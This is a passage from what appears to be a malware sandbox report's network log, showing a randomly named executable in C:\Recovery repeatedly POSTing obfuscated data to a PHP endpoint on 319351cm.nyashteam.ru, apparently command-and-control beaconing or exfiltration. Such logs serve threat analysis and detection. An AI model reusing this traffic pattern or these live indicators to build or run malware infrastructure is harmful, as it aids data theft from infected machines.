Dec 6, 2024 03:13:07.202044010 CET	1012	OUT	Data Raw: 53 55 5f 5b 59 59 53 59 5c 56 52 5a 50 59 5a 50 58 5d 5b 58 50 5a 56 54 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: SU_[YYSY\VRZPYZPX][XPZVTZ^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP"D>=$</^2-T1V0(1==7X Y*':'\5+W,=']/!Q!,
Dec 6, 2024 03:13:07.975847960 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 03:13:08.257725000 CET	814	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 02:13:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=t6nH6yIhZNgbQzjDcAslV%2BWWzTARV1wjG%2F7Lsk7ypL6m7AZ%2BI8i4PrdmTlS3PCdBJnN6FShLhkRdgXS3kEVouikolnRWlIam7aoBJ%2F6HK0K1OkpKtrKikHYzr%2BQ%2B3LjXBydUnAzTMHc%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed8c143dee97298-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=7317&min_rtt=6635&rtt_var=3852&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1285&delivery_rate=120731&cwnd=172&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 56 5c 55 0d 0a 30 0d 0a 0d 0a Data Ascii: 42V\U0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.6	49891	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:13:08.491251945 CET	297	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Dec 6, 2024 03:13:08.842592955 CET	1012	OUT	Data Raw: 56 53 5a 5a 5c 5d 56 5f 5c 56 52 5a 50 5c 5a 51 58 59 5b 5a 50 55 56 58 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: VSZZ\]V_\VRZP\ZQXY[ZPUVXZ^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP"E= 9Z="?%<&9V%,?']=*X(7?R1:'"(+S,']/!Q!8
Dec 6, 2024 03:13:09.620182991 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 03:13:09.883851051 CET	816	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 02:13:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=V6e9LKgd%2FJWBE%2Fk6BIuAwXPkz03jthYsdXyS8S7n4xR36sofyXcjpgG%2BCCKj2PJ6aZarPcwHWC19QNNLlRc9wupcacawvSObeR4gQg9e9bAx3w0EWUIvyk%2BLbk%2BY9elnPw%2FJ8PKinqE%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed8c14e2d7472c2-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=27451&min_rtt=23450&rtt_var=16796&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1309&delivery_rate=26325&cwnd=163&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 56 5c 55 0d 0a 30 0d 0a 0d 0a Data Ascii: 42V\U0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.6	49895	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:13:10.205128908 CET	297	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Dec 6, 2024 03:13:10.561419964 CET	1012	OUT	Data Raw: 53 52 5f 5e 5c 5a 56 52 5c 56 52 5a 50 52 5a 53 58 5b 5b 5c 50 54 56 58 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: SR_^\ZVR\VRZPRZSX[[\PTVXZ^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP!311?R<+[1!&Z(3;2)>[ %S&);_5?8=']/!Q!
Dec 6, 2024 03:13:11.290348053 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 03:13:11.548480034 CET	808	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 02:13:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=e%2BXOo1uAxV0NbEYBDGDl6I00FxA8PpfPBBAMayUgToTmBPfjAAubtNnDrrnRxwMAC5ZjliMLd0zTSZKFv%2F3ZeGHGV%2Fh86qcykwwptpq70iMu0J8mHiR5Oysm9mD9IOZEZ35XXzlAxZ4%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed8c1589e774379-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=6539&min_rtt=1581&rtt_var=10510&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1309&delivery_rate=35392&cwnd=193&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 56 5c 55 0d 0a 30 0d 0a 0d 0a Data Ascii: 42V\U0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.6	49901	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:13:11.604377031 CET	297	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1284 Expect: 100-continue Connection: Keep-Alive
Dec 6, 2024 03:13:11.951967001 CET	1284	OUT	Data Raw: 53 54 5a 59 59 5a 53 5f 5c 56 52 5a 50 5a 5a 56 58 59 5b 57 50 5e 56 58 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: STZYYZS_\VRZPZZVXY[WP^VXZ^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP">32*"+% %$<']>Y)0!/W2/Y#++V,']/!Q!(
Dec 6, 2024 03:13:12.690315962 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 03:13:12.953449011 CET	960	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 02:13:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d3n9ndtJW9yIYECH8dZTHo5QNbmPd%2BcznEDck9yg6oKdfM7FpJ2jg%2BOsaOfGwyJrklQ3VEJTbft7SCg8tjZCriDZEJVW5Dd%2Fzj%2BfNxXg3ktTT%2BJuFeDsq1CRSrt78tgwk2b0XFykZmk%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed8c1615ae78c7b-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=3801&min_rtt=1967&rtt_var=4407&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1581&delivery_rate=87708&cwnd=185&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 39 38 0d 0a 00 1e 25 59 25 3d 24 13 22 1c 05 07 2d 3d 33 08 25 3d 3d 5a 2d 06 09 07 22 05 1c 07 3f 3c 3f 0f 27 1a 30 04 29 3f 35 13 28 3f 33 51 2b 38 23 5b 00 13 26 5e 29 13 0f 0e 2a 39 23 07 32 23 29 00 2a 08 03 00 3e 10 23 51 20 3a 0b 16 35 04 38 53 33 3d 24 0e 2f 35 38 5f 3f 09 2a 1a 31 24 21 5e 0e 11 39 55 26 55 32 5f 37 01 3f 1f 26 0e 0e 5b 28 17 27 03 24 11 3b 55 29 34 20 10 27 1f 29 10 24 01 0a 55 26 3a 0c 59 23 01 27 1d 2d 3c 23 5f 2c 01 2c 52 0d 35 54 51 0d 0a 30 0d 0a 0d 0a Data Ascii: 98%Y%=$"-=3%==Z-"?<?'0)?5(?3Q+8#[&^)9#2#)>#Q :58S3=$/58_?*1$!^9U&U2_7?&[('$;U)4 ')$U&:Y#'-<#_,,R5TQ0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.6	49902	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:13:11.726195097 CET	297	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Dec 6, 2024 03:13:12.077058077 CET	1012	OUT	Data Raw: 56 55 5a 5b 59 50 56 5b 5c 56 52 5a 50 59 5a 55 58 53 5b 56 50 58 56 5d 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: VUZ[YPV[\VRZPYZUXS[VPXV]Z^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP"(0!?";R<%#Z2()1S0;*^(.Z#?5W1:,5(8=']/!Q!,
Dec 6, 2024 03:13:12.816081047 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 03:13:13.049426079 CET	807	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 02:13:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8PoujmaV8dkZhihTiTONZF3BS25bkt0U4DluXnla0%2B4y7Mq7PNit8wbEKxSQsrvBYSpX5NbCRWBUyi%2FCzc8YdUrAl4Ue11OUYZKC2fCq8q3w6dGygdd7t0T%2FHLqYn3wxxwZDDnqtgMA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed8c1622c964376-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=3322&min_rtt=1601&rtt_var=4042&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1309&delivery_rate=94996&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 56 5c 55 0d 0a 30 0d 0a 0d 0a Data Ascii: 42V\U0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.6	49908	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:13:13.293025017 CET	273	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1012 Expect: 100-continue
Dec 6, 2024 03:13:13.639452934 CET	1012	OUT	Data Raw: 56 51 5f 5a 59 5b 56 52 5c 56 52 5a 50 53 5a 53 58 5d 5b 5b 50 55 56 5a 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: VQ_ZY[VR\VRZPSZSX][[PUVZZ^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP!==)2#W>%2(6%/?W'*] ?1%:684/=']/!Q!
Dec 6, 2024 03:13:14.385878086 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 03:13:14.684130907 CET	801	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 02:13:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9iJS53Gco2BeuRI1hvGPSfH1rARobDWH9l5rI1eql3s2XaH1SzZSwqsn1uHMxlL3AGpXVdWeiS125WsW9Vrqom6TKdybbY7UlTX5Mplp3DuN4wj9vFD7kRhHPUdbXUT3I4dwNgWhHlA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed8c16beca05e5f-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=4864&min_rtt=2139&rtt_var=6253&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1285&delivery_rate=60978&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 56 5c 55 0d 0a 30 0d 0a 0d 0a Data Ascii: 42V\U0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.6	49911	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:13:14.929608107 CET	297	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Dec 6, 2024 03:13:15.280103922 CET	1012	OUT	Data Raw: 53 56 5f 5f 5c 5a 56 53 5c 56 52 5a 50 5b 5a 56 58 53 5b 5c 50 58 56 58 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: SV__\ZVS\VRZP[ZVXS[\PXVXZ^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP"A(#9\=T$>%18)2'U'&^)>#!/=R':;#(7/=']/!Q!$
Dec 6, 2024 03:13:16.015139103 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 03:13:16.249187946 CET	809	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 02:13:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=E0sV3uTow4S%2B2fDPKsEZ2Od%2FK%2FDynbCus0oSmEwmOTYLJs4QQjMBkIblXrOkUHV7RlBzr1dGYV12sPXszf%2BFbmvHWpYvdv06T4zzDUvtxt6gUqPRwMfu5MruqibyufYdnzHRLdWUa7Q%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed8c1761e248cca-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=4078&min_rtt=1838&rtt_var=5170&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1309&delivery_rate=73882&cwnd=236&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 56 5c 55 0d 0a 30 0d 0a 0d 0a Data Ascii: 42V\U0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.6	49914	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:13:16.500498056 CET	297	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Dec 6, 2024 03:13:16.858180046 CET	1012	OUT	Data Raw: 53 52 5f 5f 5c 5f 56 59 5c 56 52 5a 50 59 5a 5c 58 5d 5b 5c 50 5e 56 55 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: SR__\_VY\VRZPYZ\X][\P^VUZ^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP"@).=+V+,'()T1,0;._)7X#?V%"+7U/']/!Q!,
Dec 6, 2024 03:13:17.592822075 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 03:13:17.829015017 CET	811	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 02:13:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0GzNYf9RbAJ7SjVc1aKx%2Fi%2FAFxBrjGLdhuDOL%2BFGEwJ96GkRZaeqERx1TaYmaLlTlffdxCRonmY9kwJQqO4Qq3e3jJ5U3CYxTXP73obj8GvxR76gAXBu3UDd%2BsojmME37GpqTQ95F%2FU%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed8c17ffe6f4244-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=4911&min_rtt=2735&rtt_var=5379&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1309&delivery_rate=72460&cwnd=217&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 56 5c 55 0d 0a 30 0d 0a 0d 0a Data Ascii: 42V\U0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.6	49920	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:13:18.088542938 CET	297	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1296 Expect: 100-continue Connection: Keep-Alive
Dec 6, 2024 03:13:18.436430931 CET	1296	OUT	Data Raw: 56 51 5a 5c 59 58 56 5b 5c 56 52 5a 50 5c 5a 57 58 52 5b 5e 50 5d 56 5d 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: VQZ\YXV[\VRZP\ZWXR[^P]V]Z^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP"@=0&?"(<%)V%Z;W$^*X?7Y)T2]"^'U8=']/!Q!8
Dec 6, 2024 03:13:19.194879055 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 03:13:19.465154886 CET	957	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 02:13:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gebD%2BGgXIRXCRaN7U3T7KQVnFN5Z%2BduAcCiwf3aku1r6qV4kUKFzNlopP9858nsN6PHAjnY5x%2BtsusWx6CwN8atcQjwJ7tdPWJcxXb9P3ohoenKnGVgqSb422KzTZclJEiChuiNqhNo%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed8c189ffa9c436-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=2943&min_rtt=1688&rtt_var=3143&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1593&delivery_rate=124456&cwnd=219&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 39 38 0d 0a 00 1e 25 10 33 3d 28 59 35 21 2c 5b 2c 3d 24 54 24 3e 0c 05 39 06 20 59 23 3b 13 5e 28 01 34 51 24 37 34 04 3e 3c 29 13 3c 2c 2f 13 3e 28 23 5b 00 13 26 18 3d 3e 2e 51 2a 00 3c 5b 31 33 21 07 3e 35 36 11 29 10 2b 14 20 14 03 5c 23 3e 38 1b 27 13 28 0d 2c 35 24 19 28 27 22 57 25 34 21 5e 0e 11 39 55 26 33 31 03 37 06 0a 08 25 56 27 07 3f 5f 3f 01 24 01 2b 57 3f 1a 2c 54 27 57 25 55 30 01 2b 0b 25 03 3e 1c 20 11 2f 54 2e 06 23 5f 2c 01 2c 52 0d 35 54 51 0d 0a 30 0d 0a 0d 0a Data Ascii: 98%3=(Y5!,[,=$T$>9 Y#;^(4Q$74><)<,/>(#[&=>.Q*<[13!>56)+ \#>8'(,5$('"W%4!^9U&317%V'?_?$+W?,T'W%U0+%> /T.#_,,R5TQ0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.6	49921	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:13:18.334285021 CET	297	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Dec 6, 2024 03:13:18.686362028 CET	1012	OUT	Data Raw: 53 52 5f 5b 5c 58 56 59 5c 56 52 5a 50 53 5a 5d 58 53 5b 5c 50 5a 56 54 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: SR_[\XVY\VRZPSZ]XS[\PZVTZ^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP">.>#(6+\1;&;V$].[*.##S%9058;W/=']/!Q!
Dec 6, 2024 03:13:19.440072060 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 03:13:19.701261997 CET	817	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 02:13:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TvPY1X8zZagzQhkopbVkxD7oEW2lpTNBhqhmBfgWLC80%2BpRw%2B7%2B%2Fy%2FX7ER4vXasH9B94jId13jmi8baF3D%2FOJ4KOrt15iyi2CpEtj%2BaCnSHpECEt%2BljGNtDFMJIgsxyKuGa2g4Vw9vM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed8c18b8ed88c78-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=4076&min_rtt=1891&rtt_var=5079&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1309&delivery_rate=75370&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 56 5c 55 0d 0a 30 0d 0a 0d 0a Data Ascii: 42V\U0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.6	49927	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
